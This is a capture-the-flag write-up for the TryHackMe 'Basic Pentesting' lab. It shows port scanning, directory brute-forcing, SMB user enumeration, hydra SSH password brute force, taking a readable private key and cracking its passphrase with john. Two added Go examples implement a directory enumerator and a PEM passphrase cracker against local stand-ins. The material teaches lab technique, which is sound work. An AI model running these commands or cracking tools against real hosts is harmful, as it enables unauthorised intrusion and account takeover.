Basic Pentesting (TryHackMe Writeup)


URL : https://tryhackme.com/room/basicpentestingjt

  • Target IP : 10.10.165.235

Scanning

  • nmap -A 10.10.165.235
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 04:40 EDT
Nmap scan report for 10.10.165.235
Host is up (0.27s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open http Apache Tomcat 9.0.7
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: basic2
|   NetBIOS computer name: BASIC2\x00
|   Domain name: \x00
|   FQDN: basic2
|_  System time: 2021-07-24T04:41:05-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-24T08:41:04
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.95 seconds

Access the website (port 80)

  • Use dirsearch to brute-force directory names
    • python3 dirsearch.py -u http://10.10.165.235/ -e all
  • Question 1: What is the name of the hidden directory on the web server (enter name without /)?
    • development
  • Browsing the development directory, we find two files
    • They are notes exchanged between J and K discussing an SMB upgrade issue.
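To show what a directory brute-forcer like dirsearch actually does, here is an added Go example (written for this page; it is not part of the original writeup and not dirsearch's own code). It first requests a path that cannot exist to learn what "not found" looks like on this server, so a catch-all host that answers 200 to everything does not flood the results, then requests every wordlist entry and keeps any path whose status differs from that baseline. Redirects are not followed: the 301 that Apache returns for /development without a trailing slash is itself the finding. The target is a constructed local test server that only knows /development/, and the wordlist is a constructed stand-in for a real one.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"time"
)

// newDemoServer stands in for the target web server (constructed for this
// example): only /development/ exists, every other path is a 404. Like Apache,
// the mux answers /development (no trailing slash) with a 301 to /development/.
func newDemoServer() *httptest.Server {
	mux := http.NewServeMux()
	mux.HandleFunc("/development/", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, `<a href="dev.txt">dev.txt</a> <a href="j.txt">j.txt</a>`)
	})
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path == "/" {
			fmt.Fprintln(w, "<html>Site doesn't have a title</html>")
			return
		}
		http.NotFound(w, r)
	})
	return httptest.NewServer(mux)
}

// enumerateDirs requests baseURL + "/" + word for every word and returns the
// paths whose status differs from the server's "not found" baseline.
// 200, 301 and 403 are all interesting; only the baseline status is discarded.
func enumerateDirs(baseURL string, words []string) (map[string]int, error) {
	client := &http.Client{
		Timeout: 5 * time.Second,
		// Do not follow redirects: a 301 for /development is the hit we want.
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
	status := func(path string) (int, error) {
		resp, err := client.Get(baseURL + path)
		if err != nil {
			return 0, err
		}
		resp.Body.Close()
		return resp.StatusCode, nil
	}

	// Baseline: a path that cannot exist tells us what "missing" looks like.
	// Some servers answer 200 (or 302 to a login page) for every path, and
	// without this check every word in the list would be reported as found.
	baseline, err := status(fmt.Sprintf("/%x-not-there", time.Now().UnixNano()))
	if err != nil {
		return nil, err
	}

	found := make(map[string]int)
	for _, w := range words {
		code, err := status("/" + w)
		if err != nil {
			return nil, err
		}
		if code != baseline {
			found["/"+w] = code
		}
	}
	return found, nil
}

func main() {
	srv := newDemoServer()
	defer srv.Close()

	// Constructed mini wordlist; in practice use dirsearch's list or SecLists.
	words := []string{"admin", "backup", "development", "images", "uploads"}
	found, err := enumerateDirs(srv.URL, words)
	if err != nil {
		panic(err)
	}
	for path, code := range found {
		fmt.Printf("%d  %s\n", code, path)
	}
}
```

Against the demo server this reports only `301  /development`; the same logic pointed at the room's box is what produces the dirsearch hit above, with the 301 telling you to request the path again with a trailing slash.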

Try to find the usernames

  • enum4linux -a 10.10.165.235
    • This reveals two local users
      • kay and jan
  • The SSH banner is OpenSSH 7.2p2, which is affected by a timing-based username-enumeration flaw (exploit-db 40136, CVE-2016-6210). Because it relies on response-time differences, it is unreliable over a high-latency link such as this one (0.27 s RTT in the nmap output).
    • https://www.exploit-db.com/exploits/40136
    • But I have tried it and it doesn't work

What is the password?

  • We need to brute-force the SSH password for these 2 users
  • Use hydra with rockyou.txt
    • hydra -l kay -P /opt/rockyou.txt ssh://10.10.165.235
    • hydra -l jan -P /opt/rockyou.txt ssh://10.10.165.235
      • We find the password armando for user jan

Log in to SSH with jan's credentials

  • ssh jan@10.10.165.235
  • We are logged in as jan, but we can't read /home/kay/pass.bak
  • However, /home/kay/.ssh is readable and contains kay's private key
    • kay forgot to remove (or protect) this key, so it may let us log in as kay without a password. Copy it to our machine: scp -r jan@10.10.165.235:/home/kay/.ssh .
  • Use the key to try to log in as kay
    • chmod 600 id_rsa
    • ssh -i id_rsa kay@10.10.165.235
    • The key is passphrase-protected, so we need to crack the passphrase

Crack the SSH key passphrase

  • Use ssh2john to convert the key into a hash john understands
    • python ssh2john.py id_rsa > john_ssh
  • Run john with the rockyou wordlist
    • john --wordlist=/opt/rockyou.txt john_ssh
    • The passphrase is beeswax
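What ssh2john and john do with this key, as an added Go example (written for this page, not the writeup's or john's own code): a key written by the OpenSSH 7.2 ssh-keygen on the box is a traditional "BEGIN RSA PRIVATE KEY" PEM whose DEK-Info header carries the cipher and IV, and whose passphrase is stretched with OpenSSL's single-MD5-round EVP_BytesToKey, which is why a wordlist attack is cheap. The example reads that header, then tries each candidate passphrase; since PEM decryption only checks PKCS#7 padding, which a wrong passphrase passes about once in 256 tries, each hit is confirmed by parsing the decrypted DER. The key is generated in the example as a stand-in for /home/kay/.ssh/id_rsa (it is not the room's key), the passphrase beeswax is taken from the writeup, and the wordlist is a constructed stand-in for rockyou.txt.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"encoding/pem"
	"errors"
	"fmt"
	"strings"
)

// keyInfo reports what ssh2john extracts from a traditional encrypted PEM key:
// the cipher name and hex IV from the DEK-Info header. For this format the KDF
// is EVP_BytesToKey (one MD5 round over passphrase+IV), so guesses are cheap.
func keyInfo(pemData []byte) (cipher, iv string, err error) {
	block, _ := pem.Decode(pemData)
	if block == nil {
		return "", "", errors.New("input is not PEM")
	}
	if !x509.IsEncryptedPEMBlock(block) {
		return "", "", errors.New("key has no passphrase; use it directly")
	}
	parts := strings.SplitN(block.Headers["DEK-Info"], ",", 2)
	if len(parts) != 2 {
		return "", "", errors.New("malformed DEK-Info header")
	}
	return parts[0], parts[1], nil
}

// crackPassphrase tries each candidate against the encrypted PEM block.
// DecryptPEMBlock only validates PKCS#7 padding, which a wrong passphrase
// satisfies roughly 1 time in 256, so a hit is confirmed by parsing the DER.
func crackPassphrase(pemData []byte, candidates []string) (string, bool) {
	block, _ := pem.Decode(pemData)
	if block == nil || !x509.IsEncryptedPEMBlock(block) {
		return "", false
	}
	for _, pw := range candidates {
		der, err := x509.DecryptPEMBlock(block, []byte(pw))
		if err != nil {
			continue // padding check failed: definitely wrong
		}
		if _, err := x509.ParsePKCS1PrivateKey(der); err != nil {
			continue // padding happened to look valid; not the real passphrase
		}
		return pw, true
	}
	return "", false
}

// makeEncryptedKey builds a stand-in for kay's id_rsa (constructed here, not
// the room's key): a fresh RSA key in the pre-OpenSSH-7.8 on-disk format,
// AES-128-CBC as the old ssh-keygen used.
func makeEncryptedKey(passphrase string) ([]byte, error) {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	block, err := x509.EncryptPEMBlock(rand.Reader, "RSA PRIVATE KEY",
		x509.MarshalPKCS1PrivateKey(key), []byte(passphrase), x509.PEMCipherAES128)
	if err != nil {
		return nil, err
	}
	return pem.EncodeToMemory(block), nil
}

func main() {
	pemData, err := makeEncryptedKey("beeswax") // passphrase from the writeup
	if err != nil {
		panic(err)
	}
	cipher, iv, err := keyInfo(pemData)
	if err != nil {
		panic(err)
	}
	fmt.Printf("DEK-Info: cipher=%s iv=%s\n", cipher, iv)

	// Constructed mini wordlist standing in for rockyou.txt.
	words := []string{"123456", "password", "armando", "beeswax", "letmein"}
	if pw, ok := crackPassphrase(pemData, words); ok {
		fmt.Println("passphrase:", pw)
	} else {
		fmt.Println("passphrase not in wordlist")
	}
}
```

Keys written by OpenSSH 7.8 and later default to the "BEGIN OPENSSH PRIVATE KEY" format, which stretches the passphrase with bcrypt_pbkdf over many rounds; ssh2john handles both, but the newer format is orders of magnitude slower to crack per guess, which is the practical reason this room's key falls to rockyou.txt in seconds.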

Use the key file and passphrase to log in as kay

  • ssh -i id_rsa kay@10.10.165.235 (enter beeswax when prompted)
  • Now /home/kay/pass.bak is readable, and it holds the final flag
    • heresareallystrongpasswordthatfollowsthepasswordpolicy

Final Screenshot
